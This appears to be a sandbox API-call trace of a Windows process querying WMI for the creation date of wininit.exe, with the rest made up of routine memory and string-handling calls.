[0401.642] SysStringLen (param_1="name=\"wininit.exe\"") returned 0x12
[0401.643] memcpy (in: _Dst=0x2c6688, _Src=0x2e4d18, _Size=0x10 | out: _Dst=0x2c6688) returned 0x2c6688
[0401.643] memcpy (in: _Dst=0x2c6696, _Src=0x2c6638, _Size=0x26 | out: _Dst=0x2c6696) returned 0x2c6696
[0401.643] malloc (_Size=0x18) returned 0x209740
[0401.643] SysStringLen (param_1="SELECT creationdate FROM Win32_Process") returned 0x26
[0401.643] SysStringLen (param_1=" WHERE name=\"wininit.exe\"") returned 0x19
[0401.643] memcpy (in: _Dst=0x2c8f28, _Src=0x2a6ed8, _Size=0x4e | out: _Dst=0x2c8f28) returned 0x2c8f28
[0401.643] memcpy (in: _Dst=0x2c8f74, _Src=0x2c6688, _Size=0x34 | out: _Dst=0x2c8f74) returned 0x2c8f74
[0401.643] free (_Block=0x209780)
[0401.643] free (_Block=0x209720)
[0401.643] free (_Block=0x209680)
[0401.643] free (_Block=0x2096e0)
[0401.644] ??0CHString@@QEAA@XZ () returned 0x16b4b0
[0401.644] GetCurrentThreadId () returned 0xdf0
[0401.644] CoCreateInstance (in: rclsid=0xffa373d0*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373e0*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0xffaa29c0 | out: ppv=0xffaa29c0*=0x33e830) returned 0x0
[0401.682] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.682] ??0CHString@@QEAA@XZ () returned 0x16b4b0
[0401.682] GetCurrentThreadId () returned 0xdf0
[0401.682] malloc (_Size=0x18) returned 0x2096e0
[0401.682] malloc (_Size=0x18) returned 0x209680
[0401.682] malloc (_Size=0x18) returned 0x209720
[0401.682] malloc (_Size=0x18) returned 0x209780
[0401.682] malloc (_Size=0x18) returned 0x209640
[0401.683] SysStringLen (param_1="\\\\") returned 0x2
[0401.683] SysStringLen (param_1="Q9IATRKPRH") returned 0xa
[0401.683] memcpy (in: _Dst=0x2c6688, _Src=0x2e4c58, _Size=0x6 | out: _Dst=0x2c6688) returned 0x2c6688
[0401.683] memcpy (in: _Dst=0x2c668c, _Src=0x2c84f8, _Size=0x16 | out: _Dst=0x2c668c) returned 0x2c668c
[0401.683] malloc (_Size=0x18) returned 0x2097a0
[0401.683] SysStringLen (param_1="\\\\Q9IATRKPRH") returned 0xc
[0401.683] SysStringLen (param_1="\\") returned 0x1
[0401.683] memcpy (in: _Dst=0x2e95b8, _Src=0x2c6688, _Size=0x1a | out: _Dst=0x2e95b8) returned 0x2e95b8
[0401.683] memcpy (in: _Dst=0x2e95d0, _Src=0x2bf748, _Size=0x4 | out: _Dst=0x2e95d0) returned 0x2e95d0
[0401.683] malloc (_Size=0x18) returned 0x20ceb0
[0401.683] SysStringLen (param_1="\\\\Q9IATRKPRH\\") returned 0xd
[0401.683] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
[0401.683] memcpy (in: _Dst=0x2c6638, _Src=0x2e95b8, _Size=0x1c | out: _Dst=0x2c6638) returned 0x2c6638
[0401.684] memcpy (in: _Dst=0x2c6652, _Src=0x2e4d18, _Size=0x16 | out: _Dst=0x2c6652) returned 0x2c6652
[0401.684] free (_Block=0x2097a0)
[0401.684] free (_Block=0x209640)
[0401.684] free (_Block=0x209780)
[0401.684] free (_Block=0x209720)
[0401.684] free (_Block=0x209680)
[0401.684] free (_Block=0x2096e0)
[0401.684] malloc (_Size=0x18) returned 0x2096e0
[0401.684] malloc (_Size=0x18) returned 0x209680
[0401.685] malloc (_Size=0x18) returned 0x209720
[0401.685] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="\\\\Q9IATRKPRH\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa29d0 | out: ppNamespace=0xffaa29d0*=0x2d6710) returned 0x0
[0401.781] free (_Block=0x209720)
[0401.781] free (_Block=0x209680)
[0401.781] free (_Block=0x2096e0)
[0401.781] CoSetProxyBlanket (pProxy=0x2d6710, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0401.782] free (_Block=0x20ceb0)
[0401.782] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.782] ??0CHString@@QEAA@XZ () returned 0x16b3c0
[0401.782] GetCurrentThreadId () returned 0xdf0
[0401.782] free (_Block=0x209760)
[0401.782] malloc (_Size=0x18) returned 0x209760
[0401.782] ??0CHString@@QEAA@XZ () returned 0x16b370
[0401.782] GetCurrentThreadId () returned 0xdf0
[0401.782] CoCreateInstanceEx (in: Clsid=0xffa373b0*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x16b320 | out: pResults=((pIID=0xffa37380*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x2c8dd0, hr=0x0))) returned 0x0
[0401.790] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.790] malloc (_Size=0x18) returned 0x2096e0
[0401.790] IWbemServices:ExecQuery (in: This=0x2d6710, strQueryLanguage="WQL", strQuery="SELECT creationdate FROM Win32_Process WHERE name=\"wininit.exe\"", lFlags=48, pCtx=0x0, ppEnum=0x16b3d0 | out: ppEnum=0x16b3d0*=0x33f4c0) returned 0x0
[0406.473] free (_Block=0x2096e0)
[0406.473] malloc (_Size=0x18) returned 0x2096e0
[0406.473] WbemContext:IWbemContext:SetValue (This=0x2c8dd0, wszName="ExcludeSystemProperties", lFlags=0, pValue=0x16b430*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0
[0406.474] free (_Block=0x2096e0)
[0406.474] CoSetProxyBlanket (pProxy=0x33f4c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0406.484] IEnumWbemClassObject:Next (in: This=0x33f4c0, lTimeout=-1, uCount=0x1, apObjects=0x16b3d8, puReturned=0x16b3f0 | out: apObjects=0x16b3d8*=0x33a370, puReturned=0x16b3f0*=0x1) returned 0x0
[0406.487] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x33e830, lFlags=0, pObj=0x33a370, uObjTextFormat=0x1, pCtx=0x2c8dd0, strText=0x16b3e0 | out: strText=0x16b3e0*="20240119140101.223600+060") returned 0x0
[0406.525] malloc (_Size=0x18) returned 0x2096e0
[0406.525] malloc (_Size=0x18) returned 0x209680
[0406.525] SysStringLen (param_1="") returned 0x5
[0406.526] SysStringLen (param_1="20240119140101.223600+060") returned 0x90
[0406.526] memcpy (in: _Dst=0x336358, _Src=0x2e4c58, _Size=0xc | out: _Dst=0x336358) returned 0x336358
[0406.526] memcpy (in: _Dst=0x336362, _Src=0x334728, _Size=0x122 | out: _Dst=0x336362) returned 0x336362
[0406.526] free (_Block=0x209760)
[0406.526] free (_Block=0x2096e0)
[0406.526] IUnknown:Release (This=0x33a370) returned 0x0
[0406.527] IEnumWbemClassObject:Next (in: This=0x33f4c0, lTimeout=-1, uCount=0x1, apObjects=0x16b3d8, puReturned=0x16b3f0 | out: apObjects=0x16b3d8*=0x0, puReturned=0x16b3f0*=0x0) returned 0x1
[0406.529] malloc (_Size=0x18) returned 0x2096e0
[0406.529] malloc (_Size=0x18) returned 0x209760
[0406.529] SysStringLen (param_1="20240119140101.223600+060") returned 0x95
[0406.529] SysStringLen (param_1="") returned 0x6
[0406.529] memcpy (in: _Dst=0x3364a8, _Src=0x336358, _Size=0x12c | out: _Dst=0x3364a8) returned 0x3364a8
[0406.529] memcpy (in: _Dst=0x3365d2, _Src=0x334bb8, _Size=0xe | out: _Dst=0x3365d2) returned 0x3365d2
[0406.530] free (_Block=0x209680)
[0406.530] free (_Block=0x2096e0)
[0406.530] free (_Block=0x209760)
[0406.530] malloc (_Size=0x18) returned 0x209760
[0406.530] IUnknown:Release (This=0x33f4c0) returned 0x0
[0406.534] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0406.535] free (_Block=0x209760)
[0406.535] free (_Block=0x209740)
[0406.535] free (_Block=0x209580)
[0406.535] free (_Block=0x209700)
[0406.535] malloc (_Size=0x18) returned 0x209700
[0406.535] malloc (_Size=0x18) returned 0x209580
[0406.535] SysStringLen (param_1="") returned 0x1b
[0406.535] SysStringLen (param_1="20240119140101.223600+060") returned 0x9b
[0406.536] memcpy (in: _Dst=0x3349a8, _Src=0x2c62c8, _Size=0x38 | out: _Dst=0x3349a8) returned 0x3349a8
[0406.536] memcpy (in: _Dst=0x3349de, _Src=0x3364a8, _Size=0x138 | out: _Dst=0x3349de) returned 0x3349de
[0406.536] free (_Block=0x2096c0)
[0406.536] free (_Block=0x209700)
[0406.536] malloc (_Size=0x18) returned 0x209700
[0406.536] malloc (_Size=0x18) returned 0x2096c0
[0406.536] SysStringLen (param_1="20240119140101.223600+060") returned 0xb6
[0406.536] SysStringLen (param_1="") returned 0xa
[0406.536] memcpy (in: _Dst=0x33fd58, _Src=0x3349a8, _Size=0x16e | out: _Dst=0x33fd58) returned 0x33fd58
[0406.536] memcpy (in: _Dst=0x33fec4, _Src=0x334bb8, _Size=0x16 | out: _Dst=0x33fec4) returned 0x33fec4
[0406.537] free (_Block=0x209580)
[0406.537] free (_Block=0x209700)
[0406.537] ??0CHString@@QEAA@XZ () returned 0x16f660
[0406.537] malloc (_Size=0x18) returned 0x209700
[0406.537] malloc (_Size=0x20) returned 0x20ceb0
[0406.537] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334bb8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.537] lstrlenW (lpString="&") returned 1
[0406.538] lstrlenW (lpString="&") returned 5
[0406.538] lstrlenW (lpString="<") returned 1
[0406.538] lstrlenW (lpString="<") returned 4
[0406.538] lstrlenW (lpString=">") returned 1
[0406.538] lstrlenW (lpString=">") returned 4
[0406.538] lstrlenW (lpString="'") returned 1
[0406.538] lstrlenW (lpString="'") returned 6
[0406.538] lstrlenW (lpString="\"") returned 1
[0406.538] lstrlenW (lpString=""") returned 6
[0406.538] malloc (_Size=0x18) returned 0x209580
[0406.538] free (_Block=0x209700)
[0406.538] free (_Block=0x20ceb0)
[0406.538] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20d68c
[0406.539] malloc (_Size=0x18) returned 0x209700
[0406.539] free (_Block=0x2095a0)
[0406.539] free (_Block=0x209580)
[0406.539] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.539] ??0CHString@@QEAA@XZ () returned 0x16f658
[0406.539] malloc (_Size=0x18) returned 0x209580
[0406.539] malloc (_Size=0x18) returned 0x2095a0
[0406.539] malloc (_Size=0x70) returned 0x20d680
[0406.539] memcpy_s (in: _Destination=0x20d680, _DestinationSize=0x6e, _Source=0x2e05b8, _SourceSize=0x68 | out: _Destination=0x20d680) returned 0x0
[0406.539] lstrlenW (lpString="&") returned 1
[0406.540] lstrlenW (lpString="&") returned 5
[0406.540] lstrlenW (lpString="<") returned 1
[0406.540] lstrlenW (lpString="<") returned 4
[0406.540] lstrlenW (lpString=">") returned 1
[0406.540] lstrlenW (lpString=">") returned 4
[0406.540] lstrlenW (lpString="'") returned 1
[0406.540] lstrlenW (lpString="'") returned 6
[0406.540] lstrlenW (lpString="\"") returned 1
[0406.540] lstrlenW (lpString=""") returned 6
[0406.540] malloc (_Size=0xa6) returned 0x20d700
[0406.540] memcpy_s (in: _Destination=0x20d700, _DestinationSize=0xa6, _Source=0x20d680, _SourceSize=0x68 | out: _Destination=0x20d700) returned 0x0
[0406.540] free (_Block=0x20d680)
[0406.540] memmove_s (in: _Destination=0x20d736, _DestinationSize=0x6e, _Source=0x20d72c, _SourceSize=0x3c | out: _Destination=0x20d736) returned 0x0
[0406.541] memcpy_s (in: _Destination=0x20d72a, _DestinationSize=0x7a, _Source=0xffa36098, _SourceSize=0xc | out: _Destination=0x20d72a) returned 0x0
[0406.541] memmove_s (in: _Destination=0x20d758, _DestinationSize=0x4c, _Source=0x20d74e, _SourceSize=0x24 | out: _Destination=0x20d758) returned 0x0
[0406.541] memcpy_s (in: _Destination=0x20d74c, _DestinationSize=0x58, _Source=0xffa36098, _SourceSize=0xc | out: _Destination=0x20d74c) returned 0x0
[0406.541] malloc (_Size=0x18) returned 0x209740
[0406.541] free (_Block=0x2095a0)
[0406.541] free (_Block=0x20d700)
[0406.541] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20d68c
[0406.541] malloc (_Size=0x18) returned 0x2095a0
[0406.541] malloc (_Size=0x18) returned 0x209760
[0406.541] SysStringLen (param_1="") returned 0x9
[0406.541] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x59
[0406.541] memcpy (in: _Dst=0x33fef8, _Src=0x334bb8, _Size=0x14 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.542] memcpy (in: _Dst=0x33ff0a, _Src=0x2ee7b8, _Size=0xb4 | out: _Dst=0x33ff0a) returned 0x33ff0a
[0406.542] free (_Block=0x209580)
[0406.542] free (_Block=0x2095a0)
[0406.542] ??0CHString@@QEAA@XZ () returned 0x16f648
[0406.542] malloc (_Size=0x18) returned 0x2095a0
[0406.542] ??0CHString@@QEAA@XZ () returned 0x16f5d8
[0406.542] malloc (_Size=0x18) returned 0x209580
[0406.543] malloc (_Size=0x8) returned 0x207fa0
[0406.543] memmove_s (in: _Destination=0x207fa0, _DestinationSize=0x8, _Source=0x206690, _SourceSize=0x8 | out: _Destination=0x207fa0) returned 0x0
[0406.543] malloc (_Size=0x18) returned 0x2096e0
[0406.543] malloc (_Size=0x20) returned 0x20ceb0
[0406.543] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x2e4cb8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.543] lstrlenW (lpString="&") returned 1
[0406.543] lstrlenW (lpString="&") returned 5
[0406.543] lstrlenW (lpString="<") returned 1
[0406.543] lstrlenW (lpString="<") returned 4
[0406.543] lstrlenW (lpString=">") returned 1
[0406.543] lstrlenW (lpString=">") returned 4
[0406.543] lstrlenW (lpString="'") returned 1
[0406.543] lstrlenW (lpString="'") returned 6
[0406.544] lstrlenW (lpString="\"") returned 1
[0406.544] lstrlenW (lpString=""") returned 6
[0406.544] malloc (_Size=0x18) returned 0x209680
[0406.544] free (_Block=0x2096e0)
[0406.544] free (_Block=0x20ceb0)
[0406.544] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20da4c
[0406.544] malloc (_Size=0x18) returned 0x2096e0
[0406.544] malloc (_Size=0x18) returned 0x209720
[0406.544] SysStringLen (param_1="") returned 0xa
[0406.544] SysStringLen (param_1="Q9IATRKPRH") returned 0x17
[0406.544] memcpy (in: _Dst=0x2a6ed8, _Src=0x334bb8, _Size=0x16 | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0406.544] memcpy (in: _Dst=0x2a6eec, _Src=0x2c62c8, _Size=0x30 | out: _Dst=0x2a6eec) returned 0x2a6eec
[0406.545] free (_Block=0x209580)
[0406.545] free (_Block=0x2096e0)
[0406.545] malloc (_Size=0x18) returned 0x2096e0
[0406.545] malloc (_Size=0x18) returned 0x209580
[0406.545] SysStringLen (param_1="Q9IATRKPRH") returned 0x21
[0406.545] SysStringLen (param_1="") returned 0xb
[0406.545] memcpy (in: _Dst=0x2e05b8, _Src=0x2a6ed8, _Size=0x44 | out: _Dst=0x2e05b8) returned 0x2e05b8
[0406.545] memcpy (in: _Dst=0x2e05fa, _Src=0x2e4cb8, _Size=0x18 | out: _Dst=0x2e05fa) returned 0x2e05fa
[0406.545] free (_Block=0x209720)
[0406.545] free (_Block=0x2096e0)
[0406.546] free (_Block=0x209680)
[0406.546] free (_Block=0x207fa0)
[0406.546] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.546] malloc (_Size=0x18) returned 0x209680
[0406.546] SysStringLen (param_1="") returned 0x17
[0406.546] SysStringLen (param_1="Q9IATRKPRH") returned 0x2c
[0406.546] memcpy (in: _Dst=0x2ee7b8, _Src=0x2c68b8, _Size=0x30 | out: _Dst=0x2ee7b8) returned 0x2ee7b8
[0406.546] memcpy (in: _Dst=0x2ee7e6, _Src=0x2e05b8, _Size=0x5a | out: _Dst=0x2ee7e6) returned 0x2ee7e6
[0406.546] free (_Block=0x2095a0)
[0406.546] lstrlenW (lpString="LIST") returned 4
[0406.547] lstrlenW (lpString="get") returned 3
[0406.547] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0406.547] malloc (_Size=0x18) returned 0x2095a0
[0406.547] malloc (_Size=0x18) returned 0x2096e0
[0406.547] SysStringLen (param_1="Q9IATRKPRH") returned 0x43
[0406.547] SysStringLen (param_1="") returned 0x18
[0406.547] memcpy (in: _Dst=0x2ee888, _Src=0x2ee7b8, _Size=0x88 | out: _Dst=0x2ee888) returned 0x2ee888
[0406.547] memcpy (in: _Dst=0x2ee90e, _Src=0x2c62c8, _Size=0x32 | out: _Dst=0x2ee90e) returned 0x2ee90e
[0406.547] free (_Block=0x209680)
[0406.547] free (_Block=0x2095a0)
[0406.548] free (_Block=0x209580)
[0406.548] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0406.548] malloc (_Size=0x18) returned 0x209580
[0406.548] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x62
[0406.548] SysStringLen (param_1="Q9IATRKPRH") returned 0x5b
[0406.548] memcpy (in: _Dst=0x3342c8, _Src=0x33fef8, _Size=0xc6 | out: _Dst=0x3342c8) returned 0x3342c8
[0406.548] memcpy (in: _Dst=0x33438c, _Src=0x2ee888, _Size=0xb8 | out: _Dst=0x33438c) returned 0x33438c
[0406.548] free (_Block=0x209760)
[0406.548] ??0CHString@@QEAA@XZ () returned 0x16f5b0
[0406.549] malloc (_Size=0x18) returned 0x209760
[0406.549] malloc (_Size=0x18) returned 0x2095a0
[0406.549] malloc (_Size=0x18) returned 0x209680
[0406.549] malloc (_Size=0x18) returned 0x209720
[0406.549] malloc (_Size=0x18) returned 0x209780
[0406.549] malloc (_Size=0x18) returned 0x209640
[0406.549] malloc (_Size=0x18) returned 0x2097a0
[0406.549] malloc (_Size=0x18) returned 0x20da70
[0406.550] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.550] lstrlenW (lpString="&") returned 1
[0406.550] lstrlenW (lpString="&") returned 5
[0406.550] lstrlenW (lpString="<") returned 1
[0406.550] lstrlenW (lpString="<") returned 4
[0406.550] lstrlenW (lpString=">") returned 1
[0406.550] lstrlenW (lpString=">") returned 4
[0406.550] lstrlenW (lpString="'") returned 1
[0406.550] lstrlenW (lpString="'") returned 6
[0406.550] lstrlenW (lpString="\"") returned 1
[0406.550] lstrlenW (lpString=""") returned 6
[0406.550] malloc (_Size=0x18) returned 0x20da90
[0406.550] free (_Block=0x20da70)
[0406.551] malloc (_Size=0x18) returned 0x20da70
[0406.551] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.551] lstrlenW (lpString="&") returned 1
[0406.551] lstrlenW (lpString="&") returned 5
[0406.551] lstrlenW (lpString="<") returned 1
[0406.551] lstrlenW (lpString="<") returned 4
[0406.551] lstrlenW (lpString=">") returned 1
[0406.551] lstrlenW (lpString=">") returned 4
[0406.551] lstrlenW (lpString="'") returned 1
[0406.551] lstrlenW (lpString="'") returned 6
[0406.551] lstrlenW (lpString="\"") returned 1
[0406.551] lstrlenW (lpString=""") returned 6
[0406.551] malloc (_Size=0x18) returned 0x20dab0
[0406.552] free (_Block=0x20da70)
[0406.552] malloc (_Size=0x18) returned 0x20da70
[0406.552] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0x6 | out: _Destination=0x16f4b0) returned 0x0
[0406.552] lstrlenW (lpString="&") returned 1
[0406.552] lstrlenW (lpString="&") returned 5
[0406.552] lstrlenW (lpString="<") returned 1
[0406.552] lstrlenW (lpString="<") returned 4
[0406.552] lstrlenW (lpString=">") returned 1
[0406.552] lstrlenW (lpString=">") returned 4
[0406.552] lstrlenW (lpString="'") returned 1
[0406.552] lstrlenW (lpString="'") returned 6
[0406.552] lstrlenW (lpString="\"") returned 1
[0406.552] lstrlenW (lpString=""") returned 6
[0406.553] malloc (_Size=0x18) returned 0x20dad0
[0406.553] free (_Block=0x20da70)
[0406.553] malloc (_Size=0x18) returned 0x20da70
[0406.553] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0x6 | out: _Destination=0x16f4b0) returned 0x0
[0406.553] lstrlenW (lpString="&") returned 1
[0406.553] lstrlenW (lpString="&") returned 5
[0406.553] lstrlenW (lpString="<") returned 1
[0406.553] lstrlenW (lpString="<") returned 4
[0406.553] lstrlenW (lpString=">") returned 1
[0406.553] lstrlenW (lpString=">") returned 4
[0406.553] lstrlenW (lpString="'") returned 1
[0406.553] lstrlenW (lpString="'") returned 6
[0406.553] lstrlenW (lpString="\"") returned 1
[0406.554] lstrlenW (lpString=""") returned 6
[0406.554] malloc (_Size=0x18) returned 0x20daf0
[0406.554] free (_Block=0x20da70)
[0406.554] malloc (_Size=0x18) returned 0x20da70
[0406.554] malloc (_Size=0x20) returned 0x20ceb0
[0406.554] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334be8, _SourceSize=0x14 | out: _Destination=0x20ceb0) returned 0x0
[0406.554] lstrlenW (lpString="&") returned 1
[0406.554] lstrlenW (lpString="&") returned 5
[0406.554] lstrlenW (lpString="<") returned 1
[0406.554] lstrlenW (lpString="<") returned 4
[0406.554] lstrlenW (lpString=">") returned 1
[0406.554] lstrlenW (lpString=">") returned 4
[0406.554] lstrlenW (lpString="'") returned 1
[0406.555] lstrlenW (lpString="'") returned 6
[0406.555] lstrlenW (lpString="\"") returned 1
[0406.555] lstrlenW (lpString=""") returned 6
[0406.555] malloc (_Size=0x18) returned 0x20db10
[0406.555] free (_Block=0x20da70)
[0406.555] free (_Block=0x20ceb0)
[0406.555] malloc (_Size=0x18) returned 0x20da70
[0406.555] malloc (_Size=0x20) returned 0x20ceb0
[0406.555] memcpy_s (in: _Destination=0x20ceb0, _DestinationSize=0x1e, _Source=0x334be8, _SourceSize=0x10 | out: _Destination=0x20ceb0) returned 0x0
[0406.555] lstrlenW (lpString="&") returned 1
[0406.555] lstrlenW (lpString="&") returned 5
[0406.555] lstrlenW (lpString="<") returned 1
[0406.555] lstrlenW (lpString="<") returned 4
[0406.556] lstrlenW (lpString=">") returned 1
[0406.556] lstrlenW (lpString=">") returned 4
[0406.556] lstrlenW (lpString="'") returned 1
[0406.556] lstrlenW (lpString="'") returned 6
[0406.556] lstrlenW (lpString="\"") returned 1
[0406.556] lstrlenW (lpString=""") returned 6
[0406.556] malloc (_Size=0x18) returned 0x20db30
[0406.556] free (_Block=0x20da70)
[0406.556] free (_Block=0x20ceb0)
[0406.556] malloc (_Size=0x18) returned 0x20da70
[0406.557] memcpy_s (in: _Destination=0x16f4b0, _DestinationSize=0xe, _Source=0x334be8, _SourceSize=0xc | out: _Destination=0x16f4b0) returned 0x0
[0406.557] lstrlenW (lpString="&") returned 1
[0406.557] lstrlenW (lpString="&") returned 5
[0406.557] lstrlenW (lpString="<") returned 1
[0406.557] lstrlenW (lpString="<") returned 4
[0406.557] lstrlenW (lpString=">") returned 1
[0406.557] lstrlenW (lpString=">") returned 4
[0406.557] lstrlenW (lpString="'") returned 1
[0406.557] lstrlenW (lpString="'") returned 6
[0406.557] lstrlenW (lpString="\"") returned 1
[0406.557] lstrlenW (lpString=""") returned 6
[0406.557] malloc (_Size=0x18) returned 0x20db50
[0406.558] free (_Block=0x20da70)
[0406.558] ?Format@CHString@@QEAAXPEBGZZ () returned 0x34dfdc
[0406.559] malloc (_Size=0x18) returned 0x20da70
[0406.559] ??1CHString@@QEAA@XZ () returned 0x6601
[0406.559] free (_Block=0x20db50)
[0406.559] free (_Block=0x20db30)
[0406.559] free (_Block=0x20db10)
[0406.559] free (_Block=0x2097a0)
[0406.560] free (_Block=0x20daf0)
[0406.560] free (_Block=0x20da90)
[0406.560] free (_Block=0x20dab0)
[0406.560] free (_Block=0x209640)
[0406.560] free (_Block=0x209780)
[0406.560] free (_Block=0x20dad0)
[0406.560] free (_Block=0x209720)
[0406.560] free (_Block=0x209680)
[0406.561] free (_Block=0x209760)
[0406.561] free (_Block=0x2095a0)
[0406.561] malloc (_Size=0x18) returned 0x2095a0
[0406.561] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRH") returned 0xbd
[0406.561] SysStringLen (param_1="root\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x173
[0406.561] memcpy (in: _Dst=0x33f3e8, _Src=0x3342c8, _Size=0x17c | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.561] memcpy (in: _Dst=0x33f562, _Src=0x33cdc8, _Size=0x2e8 | out: _Dst=0x33f562) returned 0x33f562
[0406.561] free (_Block=0x209580)
[0406.561] malloc (_Size=0x18) returned 0x209580
[0406.562] malloc (_Size=0x18) returned 0x209760
[0406.562] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x230
[0406.562] SysStringLen (param_1="") returned 0xa
[0406.562] memcpy (in: _Dst=0x3365f8, _Src=0x33f3e8, _Size=0x462 | out: _Dst=0x3365f8) returned 0x3365f8
[0406.562] memcpy (in: _Dst=0x336a58, _Src=0x334be8, _Size=0x16 | out: _Dst=0x336a58) returned 0x336a58
[0406.562] free (_Block=0x2095a0)
[0406.562] free (_Block=0x209580)
[0406.562] free (_Block=0x209740)
[0406.562] free (_Block=0x2096e0)
[0406.562] free (_Block=0x20da70)
[0406.563] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.563] malloc (_Size=0x18) returned 0x2096e0
[0406.563] SysStringLen (param_1="") returned 0x0
[0406.563] SysStringLen (param_1="") returned 0x60
[0406.563] memcpy (in: _Dst=0x33fef8, _Src=0x270ac8, _Size=0x2 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.563] memcpy (in: _Dst=0x33fef8, _Src=0x2c8f28, _Size=0xc2 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.563] free (_Block=0x209040)
[0406.563] malloc (_Size=0x18) returned 0x209040
[0406.563] SysStringLen (param_1="") returned 0x60
[0406.563] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x23a
[0406.563] memcpy (in: _Dst=0x336a88, _Src=0x33fef8, _Size=0xc2 | out: _Dst=0x336a88) returned 0x336a88
[0406.564] memcpy (in: _Dst=0x336b48, _Src=0x3365f8, _Size=0x476 | out: _Dst=0x336b48) returned 0x336b48
[0406.564] free (_Block=0x2096e0)
[0406.564] WbemLocator:IUnknown:Release (This=0x2d6710) returned 0x0
[0406.566] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0406.566] malloc (_Size=0x18) returned 0x2096e0
[0406.566] SysStringLen (param_1="") returned 0x0
[0406.567] SysStringLen (param_1="20240119140101.223600+060") returned 0xc0
[0406.567] memcpy (in: _Dst=0x33f3e8, _Src=0x2bf728, _Size=0x2 | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.567] memcpy (in: _Dst=0x33f3e8, _Src=0x33fd58, _Size=0x182 | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.567] free (_Block=0x209560)
[0406.567] _kbhit () returned 0x0
[0406.570] malloc (_Size=0x18) returned 0x209560
[0406.570] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x29a
[0406.570] SysStringLen (param_1="20240119140101.223600+060") returned 0xc0
[0406.570] memcpy (in: _Dst=0x336fd8, _Src=0x336a88, _Size=0x536 | out: _Dst=0x336fd8) returned 0x336fd8
[0406.570] memcpy (in: _Dst=0x33750c, _Src=0x33f3e8, _Size=0x182 | out: _Dst=0x33750c) returned 0x33750c
